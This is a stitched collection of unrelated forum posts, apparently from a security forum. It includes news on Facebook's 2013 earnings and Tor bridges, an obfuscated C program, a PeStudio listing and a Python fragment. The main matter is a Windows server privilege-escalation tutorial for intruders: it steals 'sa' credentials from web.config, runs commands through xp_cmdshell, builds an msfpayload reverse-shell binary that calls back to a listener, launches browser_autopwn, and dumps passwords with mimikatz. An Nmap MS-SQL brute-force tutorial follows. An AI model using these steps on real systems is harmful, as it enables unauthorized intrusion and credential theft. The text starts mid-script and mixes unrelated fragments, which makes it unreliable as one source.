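
def amplification_by_client(flows, server, port):
    """Operator-side view: bytes `server` sent back per byte it received, per client.

    A ratio near 1 is ordinary time sync; hundreds means the server is answering
    something like NTP monlist and is usable as a reflector against third parties.
    """
    req = defaultdict(int)
    resp = defaultdict(int)
    for f in flows:
        if f["dst"] == server and f["dport"] == port:
            req[f["src"]] += f["bytes"]
        elif f["src"] == server and f["sport"] == port:
            resp[f["dst"]] += f["bytes"]
    return {client: resp[client] / req[client] for client in req if req[client]}


def abused_as_reflector(flows, server, port, threshold=20.0):
    """Clients (really: spoofed victims) whose amplification ratio reaches `threshold`."""
    ratios = amplification_by_client(flows, server, port)
    return sorted(c for c, ratio in ratios.items() if ratio >= threshold)


if __name__ == "__main__":
    flows = parse_flows(SAMPLE_FLOWS)
    print("unsolicited replies at victim:", unsolicited_reflections(flows, "192.0.2.9"))
    print("amplification per client:", amplification_by_client(flows, "198.51.100.10", 123))
    print("amplified towards:", abused_as_reflector(flows, "198.51.100.10", 123))
```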
-
[h=1]Facebook Q1 Earnings: Striking Mobile Revenue Growth[/h]
May 1st, 2013, 20:37 GMT · By Gabriela Vatu

Facebook has barely exceeded estimates and reported revenues of $1.458 billion (€1.105 billion) for the first quarter of 2013; it also announced a 54% increase in mobile revenues.

The company has published its first quarterly results of 2013. Overall, Facebook's revenues exceeded the $1.44 billion (€1.09 billion) estimates of Wall Street specialists. The social network also brought in over $751 million (€570 million) in mobile revenue in the first quarter, which is a 54% increase year-over-year. This has been extremely important to investors over the past year, so such an increase in this division is expected to cause a rise in stock prices for Facebook.

Out of the company's overall result for the first three months, 85% came from advertising. Facebook has managed to garner $1.25 billion (€0.94 billion) by selling ads, which is 43% more than last year. Mobile ads also played an important part, as they represented 30% of the total ad revenue, which is above Wall Street expectations.

Facebook's net income for the first quarter was $219 million (€166 million), a small increase over last year's results, when it had profits of $205 million (€155 million). The social network giant also announced that it had cash and marketable securities of $9.5 billion (€7.2 billion) at the end of the quarter.

"We've made a lot of progress in the first few months of the year," Mark Zuckerberg, Facebook CEO, said at the conference. He continued by saying that they've seen strong growth and engagement across the community, as well as launched several exciting products.

Facebook's daily active users number also increased by 26% over the last year, up to 665 million on average in March. The monthly active users number also grew significantly, reaching 1.11 billion. This represents a 23% increase over last year.

David Spillane, Facebook's Chief Accounting Officer, has announced that he will be leaving the company.

Source: Facebook Q1 Earnings: Striking Mobile Revenue Growth - Softpedia
-
http://www.youtube.com/watch?v=ghC_UCavA5o&feature=share
-
242 rows affected. ( Query took 0.0078 sec )
-
[h=3]Hacking Windows Servers - Privilege Escalation[/h]

Most of us here can hack websites and servers. But what we hate the most is an error message: Access Denied! We know some methods to bypass certain restrictions using symlinks, privilege escalation using local root exploits and some similar attacks. But these get the job done only on Linux servers. What about Windows servers? Here are some ways to bypass certain restrictions on Windows servers or get SYSTEM privileges:

1. Using the "sa" account to execute commands by MSSQL query via the 'xp_cmdshell' stored procedure.
2. Using a meterpreter payload to get a reverse shell over the target machine.
3. Using browser_autopwn. (Really...)
4. Using other tools like pwdump7, mimikatz, etc.

Using the tools is an easy way, but the real fun of hacking lies in the first three methods I mentioned above.

1. Using xp_cmdshell

Most of the time on Windows servers, we have read permission over the files of other IIS users, which is needed to make this method work. If we are lucky enough, we will find login credentials of the "sa" account of the MSSQL server inside the web.config file of any website. You must be wondering why only "sa"? Here, "sa" stands for Super Administrator and as the name tells, this user has all possible permissions over the server. The picture below shows the connection string containing login credentials of the "sa" account.

Using this, we can log into the MSSQL server locally (using our web backdoor) as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path. So, after getting the "sa" account, we can login remotely using HeidiSQL. HeidiSQL is an awesome tool to connect to remote database servers. You can download it here.

After logging into the MSSQL server with the sa account, we get a list of databases and their contents. Now we can execute commands using MSSQL queries via xp_cmdshell (with administrator privileges). Syntax for the query is:

xp_cmdshell '[command]'

For example, if I need to know my current privileges, I would query:

xp_cmdshell 'whoami'

This shows that I am currently NT Authority/System, which most of us know is the highest user in the Windows user hierarchy. Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP.

Note: If the server does not have the xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online.

2. Meterpreter Payload

This method is quite easy and comes in useful when we cannot read files of other users, but we can execute commands. Using metasploit, generate a reverse shell payload binary. For example:

msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe

Now we will upload this executable to the server using our web backdoor. Run the multi/handler auxiliary at our end. (Make sure the ports are forwarded properly.) Now it's time to execute the payload. If everything goes right, we will get a meterpreter session over the target machine as shown below. We can also use php, asp or other payloads.

3. Browser Autopwn

This seems odd as a way of hacking a server. But I myself found this a clever way to do the job, especially in scenarios where we are allowed to execute commands, but we cannot run executables (our payloads) due to software restriction policies in a domain environment. Most Windows servers have an outdated Internet Explorer and we can exploit them if we can execute commands. I think it is clear by now what I'm trying to explain. We can start Internet Explorer from the command line and make it browse to a specific URL. Syntax for this:

iexplore.exe <URL>

where URL would be our server address which would be running browser_autopwn. After that we can use railgun to avoid antivirus detection.

4. Using readily available tools

Tools like pwdump and mimikatz can crack passwords of Windows users.

- pwdump7 gives out the NTLM hashes of the users which can be cracked further using John the Ripper. The following screenshot shows NTLM hashes from pwdump7.
- mimikatz is another great tool which extracts the plain text passwords of users from lsass.exe. The tool is in some language other than English so do watch tutorials on how to use it. The following picture shows plain text passwords from mimikatz.

You can google them and learn how to use these tools and what they actually exploit to get the job done for you. I hope you can now exploit every other Windows server. Happy Hacking.

About The Author
This article has been written by Deepankar Arora. He is an independent security researcher from India and has been listed in various halls of fame.

Source: Hacking Windows Servers - Privilege Escalation | Learn How To Hack - Ethical Hacking and security tips
-
[h=1]Tor calls for help as its supply of bridges falters[/h]
[h=2]Bridges help users in countries like China and Iran access the network.[/h]
by Sean Gallagher - Apr 17 2013, 7:23pm

Just like the US highway infrastructure, Tor needs new bridges. The encrypted anonymizing "darknet" that allows activists, journalists, and others to access the Internet without fear of censorship or monitoring—and which has also become a favored technology of underground groups like child pornographers—is having increasing difficulty serving its users in countries that have blocked access to Tor's entry points.

Tor bridges are computers that act as hidden gateways to Tor's darknet of relays. After campaigning successfully last year to get more volunteers to run obfuscated Tor bridges to support users in Iran trying to evade state monitoring, the network has lost most of those bridges, according to a message to the Tor relays mailing list by Tor volunteer George Kadianakis. "Most of those bridges are down, and fresh ones are needed more than ever," Kadianakis wrote in an e-mail, "since obfuscated bridges are the only way for people to access Tor in some areas of the world (like China, Iran, and Syria)."

Obfuscated bridges allow users to connect to the Tor network without using one of the network's known public bridges or relays as an initial entry point. Obfuscated bridges have become a necessity for Tor users in countries with networks guarded by various forms of deep packet inspection technology, where censors have put in place filters that spot traffic matching the signature of a Tor-protected connection. Some of these censors use a blocking list for traffic to known Tor bridges. To circumvent detection, Tor users can use a plugin called a "pluggable transport" to connect to an obfuscated bridge and mask their network signature.

To further evade potential censoring, the addresses for obfuscated bridges are not part of Tor's main directory but are stored in a distributed database called BridgeDB. The BridgeDB's interface spoons out addresses two at a time per request in an effort to prevent attacks to expose a full list, and no BridgeDB instance keeps a full list of the available bridges. Additionally, Tor provides "unpublished" bridge addresses to users who request them via e-mail. The Tor Project's support assistants—volunteers who respond to support requests—only respond to requests from Gmail and Yahoo e-mail accounts, both to deal with the flood of requests and to reduce the chance that an attacker will be able to learn the addresses of a large number of bridges.

The problem for Tor is that those bridges do get detected by attackers over time, and pluggable transports can eventually be detected. The most widely used pluggable transport in the Tor network, obfs2, no longer works in China. A new plugin, obfs3, will work in China, but it runs only on the latest version of the obfuscated bridge proxy—which was recently rewritten in Python. "Looking into BridgeDB," Kadianakis wrote in his message to the Tor community, "we have 200 obfs2 bridges, but only 40 obfs3 bridges: this means that we need more people running the new Python obfsproxy! Upgrading obfsproxy should be easy now, since we prepared new instructions and Debian/Ubuntu packages." He added that there is also a particular need for more unpublished bridges.

For those who want to donate bridges to the Tor network, the easiest route is to use Tor Cloud, an Amazon Web Services Elastic Compute Cloud image created by the Tor Project that allows people to leverage Amazon's free usage tier to deploy a bridge.

Source: http://arstechnica.com/information-technology/2013/04/tor-calls-for-help-as-its-supply-of-bridges-falters/
-
[C] Love letter (obfuscated C contest 1990)

char*lie;

        double time, me= !0XFACE,
        not; int rested,   get, out;
        main(ly, die) char ly, **die ;{
            signed char lotte,


dear; (char)lotte--;
        for(get= !me;; not){
        1 -  out & out ;lie;{
        char lotte, my= dear,
        **let= !!me *!not+ ++die;
            (char*)(lie=

"The gloves are OFF this time, I detest you, snot\n\0sed GEEK!");
        do {not= *lie++ & 0xF00L* !me;
        #define love (char*)lie -
        love 1s *!(not= atoi(let
        [get -me?
            (char)lotte-

(char)lotte: my- *love -
        'I'  -  *love -  'U' -
        'I'  -  (long)  - 4 - 'U' ])- !!
        (time  =out=  'a'));} while( my - dear
        && 'I'-1l  -get-  'a'); break;}}
            (char)*lie++;

        (char)*lie++, (char)*lie++; hell:0, (char)*lie;
        get *out* (short)ly   -0-'R'-  get- 'a'^rested;
        do {auto*eroticism,
        that; puts(*( out
            - 'c'
        -('P'-'S') +die+ -2 ));}while(!"you're at it");

for (*((char*)&lotte)^=
        (char)lotte; (love ly) [(char)++lotte+
        !!0xBABE];){ if ('I' -lie[ 2 +(char)lotte]){ 'I'-1l ***die; }
        else{ if ('I' * get *out* ('I'-1l **die[ 2 ])) *((char*)&lotte) -=
        '4' - ('I'-1l); not; for(get=!

get; !out; (char)*lie  &  0xD0- !not) return!!
        (char)lotte;}

        (char)lotte;
        do{ not* putchar(lie [out
        *!not* !!me +(char)lotte]);
        not; for(;!'a';);}while(
            love (char*)lie);{

register this; switch( (char)lie
        [(char)lotte] -1s *!out) {
        char*les, get= 0xFF, my; case' ':
        *((char*)&lotte) += 15; !not +(char)*lie*'s';
        this +1s+ not; default: 0xF +(char*)lie;}}}
        get - !out;
        if (not--)
        goto hell;
            exit( (char)lotte);}

Source: http://www0.us.ioccc.org/1990/westley.c

PS: You may get an error about an invalid suffix "s". Replace that "s" with "L" or "5".
-
Pen Testing SQL Servers With Nmap

The Nmap Scripting Engine has transformed Nmap from a plain port scanner into a penetration testing machine. With the variety of scripts that exist so far, we can even perform a full penetration test of an SQL database without any other tool. In this tutorial we will look at these scripts, what kind of information they extract from the database, and how we can exploit the SQL server and execute system commands through Nmap.

Most SQL databases run on port 1433, so in order to discover information about the database we need to execute the following script:

[Image: Obtain SQL Information – Nmap]

So we already have the database version and the instance name. The next step is to check whether a weak password is used for authentication with the database. To achieve that we run the following Nmap script, which performs a brute-force attack:

[Image: Brute Force Weak MS-SQL Accounts – Nmap]

As we can see, in this case we didn't discover any credentials. If we want, we can use this script with our own username and password lists to discover a valid database account with this command:

nmap -p1433 --script ms-sql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt

However, we can always try another script, which checks for null passwords on Microsoft SQL Servers:

[Image: Check For Null passwords on SA accounts – Nmap]

Now we know that the sa account has no password. We can use this information to connect to the database directly, or to continue executing further Nmap scripts that require valid credentials. If we want to know which databases the sa account (or any other account we have discovered) has access to, we can run the ms-sql-hasdbaccess script with the following arguments:

[Image: Discover which user has access to which db – Nmap]

We can even query the Microsoft SQL Server via Nmap to obtain the database tables:

[Image: List Tables – Nmap]

In the 2000 version of SQL Server, xp_cmdshell is enabled by default, so we can even execute operating system commands through Nmap scripts, as can be seen in the images below:

[Image: Run OS command via xp_cmdshell – Nmap]
[Image: Run net users via xp_cmdshell – Nmap]

Last but not least, we can run a script to extract the database password hashes for cracking with tools like John the Ripper:

[Image: Dump MS-SQL hashes – Nmap]

In this case we didn't get any hashes, because there was only one account on the database, sa, which has a null password.

Source: Pen Testing SQL Servers With Nmap | Penetration Testing Lab
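A defender-side use of the same scan results, as an added example that is not from the original tutorial: the script below parses Nmap's XML output (-oX) for the NSE scripts discussed above and turns it into findings, flagging logins accepted with an empty or guessed password and SQL Server 2000 instances, where xp_cmdshell is on by default. The sample XML, hosts, versions and script output strings are constructed for the example; the text printed by the real scripts differs.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample of Nmap XML output (-oX). The script ids are real NSE
# script names; the hosts, versions and output strings are made up.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun>
 <host><address addr="10.0.0.5" addrtype="ipv4"/><ports>
  <port protocol="tcp" portid="1433"><state state="open"/><service name="ms-sql-s"/>
   <script id="ms-sql-info" output="Version: Microsoft SQL Server 2000 Instance name: MSSQLSERVER"/>
   <script id="ms-sql-empty-password" output="[10.0.0.5:1433] sa:&lt;empty&gt; =&gt; Login Success"/>
  </port></ports></host>
 <host><address addr="10.0.0.9" addrtype="ipv4"/><ports>
  <port protocol="tcp" portid="1433"><state state="open"/><service name="ms-sql-s"/>
   <script id="ms-sql-info" output="Version: Microsoft SQL Server 2008 R2 Instance name: SQLEXPRESS"/>
   <script id="ms-sql-empty-password" output="[10.0.0.9:1433] No credentials found"/>
  </port></ports></host>
</nmaprun>
"""

# Any account that ms-sql-empty-password or ms-sql-brute reports as logging in
LOGIN_RE = re.compile(r"(\w+):\S* => Login Success")
VERSION_RE = re.compile(r"Microsoft SQL Server (\d{4})")


def audit_mssql_scan(xml_text):
    """Map each host address to a list of findings worth fixing."""
    findings = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue
            out = {s.get("id"): s.get("output", "") for s in port.iter("script")}
            notes = []
            for sid in ("ms-sql-empty-password", "ms-sql-brute"):
                for user in LOGIN_RE.findall(out.get(sid, "")):
                    notes.append(f"{user}: login accepted with empty/guessed password ({sid})")
            m = VERSION_RE.search(out.get("ms-sql-info", ""))
            if m and m.group(1) == "2000":
                # xp_cmdshell is on by default in SQL Server 2000, so any
                # sysadmin login also means OS command execution on the host
                notes.append("SQL Server 2000: xp_cmdshell enabled by default")
            if notes:
                findings[addr] = notes
    return findings


if __name__ == "__main__":
    for addr, notes in audit_mssql_scan(SAMPLE_NMAP_XML).items():
        print(addr, *notes, sep="\n  ")
```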
-
PeStudio

PeStudio 6.70
Author: Marc Ochsenmeier
Author email: info@winitor.com
Author website: winitor
Description: PeStudio is a free tool for static analysis of any Windows executable; it reveals not only raw data but also indicators of trust. Executable files analyzed with PeStudio are never started, so you can analyze suspicious applications with PeStudio with no risk. Depending on how it is started, PeStudio has either a Graphical User Interface (GUI) or a Character-Based User Interface (CUI), the latter being especially useful for batch-mode parsing of executable files. PeStudio has a set of unique features, such as looking up the image being analyzed on VirusTotal and starting new instances of PeStudio for the dependencies of the image. PeStudio reads the Windows Portable Executable format directly from the raw file data; no Windows API is used to gather the elements. Another feature unique to PeStudio is the ability to create an XML report of the image being analyzed.
Filesize: 380 kB
Date: Tuesday 23 April 2013 - 08:56:45
Downloads: 86

Source: PeStudio 6.70 / Portable Executable Tools / Downloads - Tuts 4 You